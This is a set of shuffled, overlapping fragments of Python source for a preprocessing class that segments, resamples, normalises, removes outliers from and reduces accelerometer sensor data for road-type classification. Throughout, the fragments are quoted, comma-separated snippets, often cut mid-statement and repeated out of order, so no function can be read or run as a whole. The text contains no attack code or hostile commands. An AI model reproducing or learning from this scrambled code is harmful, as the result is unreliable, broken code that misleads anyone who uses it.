TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)):", "if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "@overrides def znormalize_quantitative_data(self, data, columns = None, mean = None, std = None):", "column is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame)", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix", "import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def segment_data(self, data,", "if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN')", "+ 1, axis=0) # 1. Ensure index is datetime index and standardize type", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def znormalize_quantitative_data(self, data,", "std = data.std() data = (data - data.mean()) / data.std() elif mean is", "pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column in columns): raise", "config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit):", "Apply a dimensionality reduction technique to a data set. :param data: :param mode:", "code after comment: # https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between( data[column].quantile(1.0", "not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode", "if not isinstance(data, pandas.DataFrame) or not isinstance(column, str) or not isinstance(unit, str): raise", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data):", "mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments = split(data, segment_length) if not exact_length:", "* test_sz) train_len = int(data_len * train_sz) valid_len = int(data_len * valid_sz) data_train,", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column]) return data raise", "segments that are too long or too short after splitting min_length_subsegements = []", "= self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 #", "column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is None:", "configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train =", "to a data set. :param data: :param columns: :param mean: :param std: :return:", "convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts unix time stamps to date time. :param", "if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode ==", ":param data: :param mode: :param reduced_column_name: :param columns: :return: \"\"\" try: if data", "unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(unwanted_labels, list)", "segment else: segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None: segments_combined", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if", "# 8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works", "data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True)", "time stamps to date time. :param data: :param column: :param unit: :return: \"\"\"", "= self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs'", "= (data[columns] - mean) / std else: data = (data - mean) /", "matrix. :param labels: :param data: :return: \"\"\" try: if data is None or", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self,", ":param unwanted_labels: :param replacement_mode: :return: \"\"\" try: if data is None or replacement_mode", "removal') selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data", "label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels',", "not all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is", "# https://en.wikipedia.org/wiki/Homogeneous_coordinates # #https://stackoverflow.com/questions/2422750/in-opengl-vertex-shaders-what-is-w-and-why-do-i-divide-by-it for ind, column in enumerate(target_columns): data[column] = data[column] *", "short after splitting min_length_subsegements = [] for segment in segments: if segment.shape[0] ==", ":param columns: :param encoding_function: :return: \"\"\" try: if data is None or mode", "= config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz'] #acelerometer_columns = ['acceleration_x', 'acceleration_y', 'acceleration_z']", "and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels,", "data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True) data", "# https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column is None", "quantitative data. :param data: :param freq: :param mode: :return: \"\"\" # Source: #", "center around 0.0 substract 0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data", "#Train selected_columns = ['acceleration_abs', 'road_label', 'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train,", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\" Converts", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data,", "mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is", "'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity':", "[group for _, group in selected_data.groupby(grouper)] for segment in selected_data_segments: data_segments.append(segment) return data_segments", "data_valid_segments[ind] = data_valid_segments[ind].set_index('time') data_valid_segments[ind] = self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in", "mode: :param label_column: :param args: :return: \"\"\" try: if data is None or", "ReplacementValReplacementStrategy from overrides import overrides import traceback import os import pandas from sklearn.decomposition", "- data[args[ind]] return data if mode == 'orientation': if len(target_columns)+1 != len(args): raise", "column, unit): \"\"\" Converts unix time stamps to date time. :param data: :param", "pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz", "is datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments", "car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in", "target_representation: :param data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name", "config, labels): \"\"\" Apply all preprocessing steps necessary for training. :param data: pandas.DataFrame", "with desired label value data_segments = [] for target_label in args: selected_data =", "= data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for ind", "data: :param columns: :param mean: :param std: :return: \"\"\" try: if data is", "freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None: segments_combined = segment else: segments_combined", "str) or not isinstance(target_columns, list): raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)", "inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing steps necessary for inference. :param", "based on quantile or a threshold value. :param data: :param replacement_mode: :param columns:", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq, mode = None): \"\"\"", "data_train_segments = [] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self,", "= [] for car_segment in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels )", "pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode", "MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides", "return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "approach via TS Fresh )[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid", "from overrides import overrides import traceback import os import pandas from sklearn.decomposition import", "data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1,", "args: :return: \"\"\" try: if data is None or mode is None: raise", "TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': # Source", "not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance( columns, list): raise", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def label_data(self, labels, data): \"\"\" Combines labels vector", "[] for segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate:", "target_label in args: selected_data = data[data[label_column] == target_label] # 2. Split by non-subsequent", "super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a time series", "\"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms'", "data: :return: \"\"\" raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) @overrides def reduce_quantitativ_data_dimensionality(self, data, mode, reduced_column_name = 'reduced',", "import pandas from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__()", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self,", "'mean', 'replacement_val', 'delet_row' :param replacement_value: any type, used as value if replacment_mode is", "index is datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data", "and data matrix. :param labels: :param data: :return: \"\"\" try: if data is", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self,", "rows that have an unwanted label. :param data: :param unwanted_labels: :param replacement_mode: :return:", "either based on quantile or a threshold value. :param data: :param replacement_mode: :param", "data, mode, reduced_column_name = 'reduced', columns = None): \"\"\" Apply a dimensionality reduction", "classical approach via TS Fresh )[:-2] data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:,", "data_len = data.shape[0] test_len = int(data_len * test_sz) train_len = int(data_len * train_sz)", "raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "or replacement_mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "== 'fixed_interval': segment_length = args[0] aggregate = args[1] exact_length = args[2] segments_aggregated =", "None or replacement_mode is None or columns is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis", "time unit, label data, remove nans') data = self.convert_unix_to_datetime(data, column = 'time', unit", "data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "if segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index = pandas.DatetimeIndex( segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined)", "replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for classical approach via TS Fresh", "= self.convert_unix_to_datetime(data, column = 'time', unit = 'ms') data = self.label_data(data, labels) data", "and std is not None: if columns is not None: data[columns] = (data[columns]", "raise TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise", "data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError,", "steps necessary for inference. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame,", "@overrides def inference_split_process(self, data, config, meta_data): \"\"\" Apply all preprocessing steps necessary for", ":param args: :return: \"\"\" try: if data is None or target_columns is None", "self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2]) data_train = self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile',", "if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data =", "(len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value) return pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError):", "mode: :param args: :return: \"\"\" try: if data is None or target_columns is", "traceback import os import pandas from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor):", "isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or", "based on a label column, semantic segementation of a fixed interval. :param data:", "mode = 'mean') if segments_combined is None: segments_combined = segment else: segments_combined =", "if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5", "for segment in selected_data_segments: data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length =", "mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments =", "\"\"\" Apply a dimensionality reduction technique to a data set. :param data: :param", "road_segment in road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments", "in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz", "data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality", "import Preprocessor from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import", "pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels':", "= args[0] aggregate = args[1] exact_length = args[2] segments_aggregated = [] split =", "data_train = data_train.loc[:, ~data_train.columns.duplicated()] data_test = data_test.loc[:, ~data_test.columns.duplicated()] data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling", "outlieres either based on quantile or a threshold value. :param data: :param replacement_mode:", "== 'quantile': # Source for next 7 lines of code after comment: #", "road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = []", "replacement_mode == 'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN')", "re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of a data set. :param current_representation:", "not isinstance(unit, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) data[column] = pandas.to_datetime(data[column], unit=unit) return data except (TypeError,", "pandas.DataFrame \"\"\" try: if data is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names,", "set. :param data: :param columns: :param mean: :param std: :return: \"\"\" try: if", "mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception:", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean':", "= ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns, mean_train, std_train) data = self.remove_outliers_from_quantitative_data(", "* train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test", "road_segments: data_test_segments.append(road_segment) #Segment Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = []", "= data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data =", "steps necessary for training. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame,", "self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train, std_train) data_valid = self.remove_outliers_from_quantitative_data(", "pandas.concat([data, data_segments[ind][selected_columns]], axis=axis) data = data.reset_index(drop=True) return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def min_max_normalize_quantitative_data(self, data, columns=None): \"\"\" Apply min-max-normalization", "data[columns].std() else: mean = data.mean() std = data.std() data = (data - data.mean())", "min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode =", "pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import traceback import os import pandas", "= reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced], axis=1)", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'mean': return MeanReplacementStrategy().replace(data,", "= self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs'", "config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time", "#print(params) labels = labels test_sz = config['pre_proc_test_sz'] train_sz = config['pre_proc_training_sz'] valid_sz = config['pre_proc_validation_sz']", "road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample')", "data_segments.append(segment) return data_segments if mode == 'fixed_interval': segment_length = args[0] aggregate = args[1]", "is 'default_val' :return: pandas.DataFrame \"\"\" try: if data is None or replacement_mode is", "column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys()", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for", ") print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean, std = self.znormalize_quantitative_data(data, selected_columns,", "mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation", "self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None: segments_combined = segment else:", "os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode categorical features using", "= None): \"\"\" Removes outlieres either based on quantile or a threshold value.", "= self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for classical approach", "except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self,", "old_index = data.index data = data.reset_index(drop=False) data = data.set_index(old_index) return data if replacement_mode", "lambda df, chunk_size : numpy.array_split(df, len(df) // chunk_size + 1, axis=0) # 1.", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def de_segment_data(self, data_segments, selected_columns=None, axis =", "euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] =", "params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') #print(params) labels = labels", "Converts unix time stamps to date time. :param data: :param column: :param unit:", "than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') #Train selected_columns =", "mean_train, std_train) data = self.remove_outliers_from_quantitative_data( data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95", "TypeError(type(data)) if mode == 'mean_estimate_gravity': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value)", "pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. Segment data segments = split(data, segment_length) if not exact_length: for segment", "1, axis=0) # 1. Ensure index is datetime index and standardize type data.index", ":param columns: :param mean: :param std: :return: \"\"\" try: if data is None:", "in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments =", "['acceleration_x', 'acceleration_y', 'acceleration_z'] acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels", "None): \"\"\" Removes outlieres either based on quantile or a threshold value. :param", "TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str):", "if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in enumerate(target_columns): data[column] =", "raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for", "ind in range(len(data_train_segments)): data_train_segments[ind] = data_train_segments[ind].set_index('time') data_train_segments[ind] = self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value)", "(isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if (len(labels) != len(data)): raise TypeError(self.messages.PROVIDED_FRAME_DOESNT_MATCH_DATA.value)", "data = data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'manhatten': reduced", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows", "a fixed interval. :param data: :param mode: :param label_column: :param args: :return: \"\"\"", "data, replacement_mode='quantile', columns=selected_columns, quantile=0.99 # current run @0.95 for classical approach via TS", "Segment data segments = split(data, segment_length) if not exact_length: for segment in segments:", ":return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame \"\"\" print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq", "target_columns, mode, args=None): \"\"\" Project accelerometer data from local vehicle coordinates to a", "Removes outlieres either based on quantile or a threshold value. :param data: :param", "https://en.wikipedia.org/wiki/Principal_component_analysis pca = PCA(n_components=1) pca.fit(data[columns]) reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced", "grouper = non_sequence.cumsum().values selected_data_segments = [group for _, group in selected_data.groupby(grouper)] for segment", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data,", "from sklearn.decomposition import PCA import numpy class SussexHuaweiPreprocessor(Preprocessor): def __init__(self): super().__init__() @overrides def", "// chunk_size + 1, axis=0) # 1. Ensure index is datetime index and", "segment in segments: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return segments #3. Remove segments that are", "Apply min-max-normalization to a data set. :param data: :param columns: :return: \"\"\" try:", "for training. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame, pandas.DataFrame, pandas.DataFrame 